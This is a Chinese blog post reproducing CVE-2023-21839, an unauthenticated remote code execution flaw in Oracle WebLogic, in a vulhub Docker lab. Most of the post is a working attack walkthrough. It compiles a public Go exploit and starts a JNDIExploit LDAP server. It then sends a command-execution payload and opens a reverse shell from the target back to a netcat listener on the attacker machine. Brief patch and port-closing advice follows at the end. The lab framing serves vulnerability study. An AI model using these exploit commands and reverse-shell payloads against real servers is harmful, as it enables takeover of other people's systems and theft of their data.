🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
CVE-2023-21839
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
Weblogic t3/iiop协议支持远程绑定对象bind到服务端。并且可以通过lookup查看,代码:c.lookup(“xxxxxx”);。
当远程对象继承自OpaqueReference时,lookup查看远程对象时,服务端会调用远程对象getReferent方法。
weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。
cd vulhub/weblogic/CVE-2023-21839
docker-compose up -d
docker-compose ps
http://192.168.233.130:7001/console/login/LoginForm.jsp
cat README.md
复现完记得关闭环境
docker-compose down
exp为go源码,需要编译为可执行文件
https://github.com/4ra1n/CVE-2023-21839
移入kali攻击机
切换到cmd目录下
cd /root/Desktop/CVE-2023-21839-master/cmd
编译go源码
go build -o CVE-2023-21839
搭建go环境
apt install gccgo-go
或者
apt install golang-go
编译go源码
go build -o CVE-2023-21839
查看文件权限,发现是可执行文件
启动payload利用工具:https://download.csdn.net/download/qq_51577576/87559814
java -jar JNDIExploit.jar --ip 192.168.233.128
执行如下命令
./CVE-2023-21839 -ip 192.168.233.130 -port 7001 -ldap ldap://192.168.233.128:1389/powershell
Ldap服务端变化
我们查找一个可以执行任意命令的poc构造方式
java -jar JNDIExploit-1.4-SNAPSHOT.jar -u
ldap://0.0.0.0:1389/Basic/Command/[cmd]
由于这里无法查看回显,我们采用创建文件的方式复现漏洞
构造的poc如下
./CVE-2023-21839 -ip 192.168.233.130 -port 7001 -ldap ldap://192.168.233.128:1389/Basic/Command/touch%20powershell.txt
靶机进入容器查看,发现powershell.txt文件创建成功
进入容器
docker ps
docker exec -it 8badac8a5915 /bin/bash
切换到文件创建目录
cd /u01/oracle/user_projects/domains/base_domain
ls
/u01/oracle/user_projects/domains/base_domain这个目录也是反弹shell的目录
nc -lvvp 55555
Nc反弹shell在文末给出
java -jar JNDIExploit-1.4-SNAPSHOT.jar -u
ldap://0.0.0.0:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported
靶机执行连接命令
./CVE-2023-21839 -ip 192.168.233.130 -port 7001 -ldap ldap://192.168.233.128:1389/Basic/ReverseShell/192.168.233.128/55555
等了一小会儿之后发现shell反弹过来了
ls
发现之前创建的文件powershell.xt
1、安装Oracle WebLogic Server最新安全补丁:
https://www.oracle.com/security-alerts/cpujan2023.html
2、关闭T3和iiop协议端口,操作方法参考:
https://help.aliyun.com/noticelist/articleid/1060577901.html
安装go环境:https://blog.csdn.net/qq_51577576/article/details/129466010
cd \CVE-2023-21839-master\cmd
go build -o CVE-2023-21839.exe
java -jar JNDIExploit-1.4-SNAPSHOT.jar --ip 攻击机IP
CVE-2023-21839.exe -ip 靶机IP -port 7001 -ldap ldap://ldapip:1389/evil
1、docker 搭建 vulhub 靶场环境
2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本(含漏洞复现文章连接)
3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
4、exp源码下载链接
5、exp可执行文件下载链接
6、JNDIExploit-v1.11.jar下载链接
7、JNDIExploit-1.4-SNAPSHOT.jar下载链接
8、[ 环境搭建篇 ] Windows 安装 go 环境并配置环境变量(附go.1.20.2安装包)
上一篇:Nginx教程 简介